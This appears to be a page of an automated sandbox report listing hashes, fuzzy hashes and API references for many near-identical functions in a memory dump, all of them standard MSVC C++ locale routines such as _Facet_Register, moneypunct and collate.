API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 236113e7196f668b6754e611c40f2c16300805861ae90513f86da00ce36ab967
Instruction ID: 7af32be0297f69a585692e2ab9e82e2eb53fd5f9903747377543ba5bbaba6e88
Opcode Fuzzy Hash: 236113e7196f668b6754e611c40f2c16300805861ae90513f86da00ce36ab967
Instruction Fuzzy Hash: 7E51DAB090424ADFCB21CF58C541F9EBBB4AF05354F22815DD945AB380E775AE04CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D47911C, Relevance: 9.1, APIs: 6, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D479123
std::_Lockit::_Lockit.LIBCPMT ref: 6D47912D

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

codecvt.LIBCPMT ref: 6D479167
std::_Facet_Register.LIBCPMT ref: 6D47917E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47919E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4791BC

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 959b0c03b06f3ec1ae2a125c7be5d1490ac2fe884cd13cd9fc1376881c412b73
Instruction ID: 645d249a41a9631d72cb5606b3d4857c1438540ce97310e87ab6846c44051db3
Opcode Fuzzy Hash: 959b0c03b06f3ec1ae2a125c7be5d1490ac2fe884cd13cd9fc1376881c412b73
Instruction Fuzzy Hash: D021C3729082299BCF14DF95C854EEE7779AF85764F22040DE601AB390DF759E01C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47727A, Relevance: 9.1, APIs: 6, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D477281
std::_Lockit::_Lockit.LIBCPMT ref: 6D47728B

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

codecvt.LIBCPMT ref: 6D4772C5
std::_Facet_Register.LIBCPMT ref: 6D4772DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4772FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47731A

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 0169c2bedf6633ca8df7a1dd2b16e841094de68d5ab78bc242d3b4775c53f800
Instruction ID: 0bd3d47f7ed6ddeda4de81d8ae610c9b0d9d70409925519696c9f92bf887b630
Opcode Fuzzy Hash: 0169c2bedf6633ca8df7a1dd2b16e841094de68d5ab78bc242d3b4775c53f800
Instruction Fuzzy Hash: FE21CFB1D082299BCF14DB95C850EEE77B5AF44214F22000EEA10AB390DF709E01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BB3E, Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D47BB45
std::_Lockit::_Lockit.LIBCPMT ref: 6D47BB4F

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

numpunct.LIBCPMT ref: 6D47BB89
std::_Facet_Register.LIBCPMT ref: 6D47BBA0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BBC0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BBDE

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: ab4cf9ff48e6282d1c01c90541746608a381f701f0e7bae2793e0eccc13de056
Instruction ID: 8a6d1a5ecbb88621c7914215708fd4d5eb66293510f8b4186be49610b3d9ba94
Opcode Fuzzy Hash: ab4cf9ff48e6282d1c01c90541746608a381f701f0e7bae2793e0eccc13de056
Instruction Fuzzy Hash: 4D11CA319042199BCF18CF64D844EEE7BB4BF85328F22441DEA14AB390DB74DE058BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CD84, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48CD8B
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CD95

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D48CDCF
std::_Facet_Register.LIBCPMT ref: 6D48CDE6
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CE06
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CE24

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: f4e6934f1362a731deb536f6b2cbbc41be17c4cc225528db01eceed5306e3b79
Instruction ID: 6a4a3e08ded4054197777a8f02cf788b8b00b9d1e14d8a505385b4a4c52c1c2b
Opcode Fuzzy Hash: f4e6934f1362a731deb536f6b2cbbc41be17c4cc225528db01eceed5306e3b79
Instruction Fuzzy Hash: 2C119A328042299BCF14DBA5C840EFE7B75AF85364F26050DD610AB391DF74EE418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CE2A, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48CE31
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CE3B

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D48CE75
std::_Facet_Register.LIBCPMT ref: 6D48CE8C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CEAC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CECA

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 90ae342df3806ccb6d2ba1fc140c9d6ee9d16d5702404f655b589d6797e95c69
Instruction ID: 673cb1e2456a296a382d523126225180c3ec358f0679807872fd1924a273018d
Opcode Fuzzy Hash: 90ae342df3806ccb6d2ba1fc140c9d6ee9d16d5702404f655b589d6797e95c69
Instruction Fuzzy Hash: C3119A729042298BCF14DBA5C840EFE77B5AF84754F26010ED610AB391DF74EE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480E80, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480E87
std::_Lockit::_Lockit.LIBCPMT ref: 6D480E91

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

numpunct.LIBCPMT ref: 6D480ECB
std::_Facet_Register.LIBCPMT ref: 6D480EE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480F02
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480F20

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 4444746f45c933f5d176d02378e3df0d57fc44abe27114a65cafa22fbcc55210
Instruction ID: 9df684e113dfa27f0677b02a0ec607c5ea61fd674d176d0d83a8b29f93d3b353
Opcode Fuzzy Hash: 4444746f45c933f5d176d02378e3df0d57fc44abe27114a65cafa22fbcc55210
Instruction Fuzzy Hash: 0611A0329042199BCF15DF65C844EFE7775AF85354F26041DD6116B290DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4809F6, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4809FD
std::_Lockit::_Lockit.LIBCPMT ref: 6D480A07

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D480A41
std::_Facet_Register.LIBCPMT ref: 6D480A58
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480A78
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480A96

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 0cbb8f35d1f16c288ac49c307b8f729b754e1f9498926055941c2b6fe08d9374
Instruction ID: b21035272712467243b7f4e3958dcc3923e8df0d1bd56202bde803e3550932e6
Opcode Fuzzy Hash: 0cbb8f35d1f16c288ac49c307b8f729b754e1f9498926055941c2b6fe08d9374
Instruction Fuzzy Hash: C011AC328041299BCF15DFA6C840EEE77B5AF84358F26440DD610AB291DF74EE028BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480B42, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480B49
std::_Lockit::_Lockit.LIBCPMT ref: 6D480B53

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D480B8D
std::_Facet_Register.LIBCPMT ref: 6D480BA4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480BC4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480BE2

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 810d1ae607404117a10b0460494062beab80b3eb922a760274a5e4e5a2f6c31a
Instruction ID: dcc723c190bfc79ed722ede56f5d2dfb2289a093371cb7d3842c33cdab91b612
Opcode Fuzzy Hash: 810d1ae607404117a10b0460494062beab80b3eb922a760274a5e4e5a2f6c31a
Instruction Fuzzy Hash: F2119A728041698BCF15DBA5C884EEE7775AF85368F26080DE611BB2A0DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480BE8, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480BEF
std::_Lockit::_Lockit.LIBCPMT ref: 6D480BF9

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D480C33
std::_Facet_Register.LIBCPMT ref: 6D480C4A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480C6A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480C88

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 89267f0f5616d0687cd3734de11f6f4edc7ff38ffbef9892f284086a0c13418f
Instruction ID: 1f4bdf154e9b70b017e5b69de2733d84f86e373b8fcc8f200a90fed21d123b15
Opcode Fuzzy Hash: 89267f0f5616d0687cd3734de11f6f4edc7ff38ffbef9892f284086a0c13418f
Instruction Fuzzy Hash: AC119A72904229CBCF19DFA5C884EEE7775AF85364F26080DE610AB2A0DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CB92, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D48CB99
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CBA3

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

messages.LIBCPMT ref: 6D48CBDD
std::_Facet_Register.LIBCPMT ref: 6D48CBF4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CC14
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CC32

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: eafc28fa10cf94dd886d0190a4f10a777cf91cf09f4ec5e269d902f463b4f264
Instruction ID: e4f4da627cea5d70f590c2cdc33763716322624db6d232ccd484656c287c18e9
Opcode Fuzzy Hash: eafc28fa10cf94dd886d0190a4f10a777cf91cf09f4ec5e269d902f463b4f264
Instruction Fuzzy Hash: 6D11AC328042298BCF04DFA5C880EEE7775AF85364F26050EE611AB391DF74DE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480A9C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480AA3
std::_Lockit::_Lockit.LIBCPMT ref: 6D480AAD

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

moneypunct.LIBCPMT ref: 6D480AE7
std::_Facet_Register.LIBCPMT ref: 6D480AFE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480B1E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480B3C

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 21e7b52b156b2e0669e50e7d6d13d2526a1b5a8791ae0f5c04656fbb3d632d3b
Instruction ID: 159880a051bd0091e8134d7548f6d7eafc48328174261f07046a2a3989c3389d
Opcode Fuzzy Hash: 21e7b52b156b2e0669e50e7d6d13d2526a1b5a8791ae0f5c04656fbb3d632d3b
Instruction Fuzzy Hash: F511AC329042298BCF05DFA6C880EEE7775AF85368F26040DD611AB291DF74DE41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48056C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480573
std::_Lockit::_Lockit.LIBCPMT ref: 6D48057D

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

ctype.LIBCPMT ref: 6D4805B7
std::_Facet_Register.LIBCPMT ref: 6D4805CE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4805EE
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48060C

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID:
API String ID: 1394824916-0
Opcode ID: 27a7bfbbae37d4812fa3357678f7db8e5075237dca8cb9f71f56a832bb1b8096
Instruction ID: f48b6790a781b0bfba114ec4271584c4cf2c65701337db8361fc1e01497c0246
Opcode Fuzzy Hash: 27a7bfbbae37d4812fa3357678f7db8e5075237dca8cb9f71f56a832bb1b8096
Instruction Fuzzy Hash: 5211AC72C042298BCF05DBA5C990EEE7775AF84364F26040DD611AB390EF34EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480420, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480427
std::_Lockit::_Lockit.LIBCPMT ref: 6D480431

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

collate.LIBCPMT ref: 6D48046B
std::_Facet_Register.LIBCPMT ref: 6D480482
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4804A2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4804C0

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 7ee3125191397fd929bf3fa2ea23136ac9ed5f00b1bbba070217940a6c362a9b
Instruction ID: bf2ccf3a0551a2146f17593b45fa2422438b2e61c61384e3bafa3a5d254fb74a
Opcode Fuzzy Hash: 7ee3125191397fd929bf3fa2ea23136ac9ed5f00b1bbba070217940a6c362a9b
Instruction Fuzzy Hash: 3D11EC329042299BCF15DFA1C880EEE7775AF80764F26040DD611BB2A0DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4804C6, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4804CD
std::_Lockit::_Lockit.LIBCPMT ref: 6D4804D7

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

collate.LIBCPMT ref: 6D480511
std::_Facet_Register.LIBCPMT ref: 6D480528
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480548
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480566

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: dade0baa090db1713266acb54e7230213054e9cafe9aa64974ea93317d63c699
Instruction ID: 35853d34022c736bc9adaa1874975f74d622de95834dace82747b579904015f4
Opcode Fuzzy Hash: dade0baa090db1713266acb54e7230213054e9cafe9aa64974ea93317d63c699
Instruction Fuzzy Hash: 3D11AC728046299BCF05DFA5C884EEE7775AF84368F26040DD614AB290DF34EE058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480612, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D480619
std::_Lockit::_Lockit.LIBCPMT ref: 6D480623

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

messages.LIBCPMT ref: 6D48065D
std::_Facet_Register.LIBCPMT ref: 6D480674
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480694
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4806B2

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 6fb30bb39e606eb83e45ae3da866fc26047d7424c60119d1a76a2ce4d966db58
Instruction ID: bf55b2ccaeb9bde9b5476912c0cd11da5956d0c329e2bdaf73b2ad1eeb8fe921
Opcode Fuzzy Hash: 6fb30bb39e606eb83e45ae3da866fc26047d7424c60119d1a76a2ce4d966db58
Instruction Fuzzy Hash: 7A11A0328042199BCF05DB65C844EEE7775AF84354F2A040DD616BB390DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4806B8, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4806BF
std::_Lockit::_Lockit.LIBCPMT ref: 6D4806C9

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

messages.LIBCPMT ref: 6D480703
std::_Facet_Register.LIBCPMT ref: 6D48071A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48073A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480758

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

